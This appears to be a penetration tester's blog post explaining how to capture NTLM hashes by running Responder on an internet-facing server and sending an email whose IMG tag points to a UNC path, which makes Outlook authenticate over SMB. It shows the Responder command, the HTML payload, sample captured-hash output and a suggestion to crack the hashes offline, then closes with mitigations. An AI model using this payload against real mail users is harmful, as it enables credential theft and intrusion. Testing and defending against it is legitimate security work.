Responder IMG SRC


I haven’t see too many blog posts regarding this topic, but I can assure it’s not super original. However, it is extremely helpful for obtaining credentials during a pentest.

Imagine you’re trying to gain access to a client’s remote access tool (I.E. VPN, Citrix, VMWare View, etc.), but you currently don’t have any credentials. You can try you luck and see if you can snag a NTLMv1/NTLMv2 hash to crack.


Much like using Responder in any other situation, you can use it to trick the Outlook email client to participate in a challenge-and-response. This requires SMB to be allowed on egress and the user would have to enable the showing of remote content.

Here’s a terrible graph to illustrate my point:


Attacker == Red Guy
Target == Blue Guy


Proof of Concept

We will want to get Responder setup on an internet-facing server.

$ python --ip= --interface=eth0 --fingerprint --verbose --lm

Next, we’ll want to embed a link to our Responder server into an email.

<IMG SRC="\\\logo.gif" ALIGN="bottom" BORDER="0">

If the target opens the email within Outlook (and provided they don’t have SMB/CIFS blocked on egress), we will get a response.

05/07/2017 12:24:49 PM - [SMB] NTLMv2 Client :
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Username : TEST_DOMAIN\test
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Hash : test::TEST_DOMAIN:9294119132765119:E5C9EB55B7336050C2202552E8872582:01010000000000009E6E35D69FC2D2017E987DD0D566E82100000000020000000000000000000000

We can then crack these captured hashes offline using your preferred wordlist/rule combinations. This should hopefully yield credentials for further activities.


Here are some solutions to this problem:

  • Block SMB/CIFS on egress.
  • Disable the automaatic downloading of external content.
  • Implement more stringent password policy and/or MFA.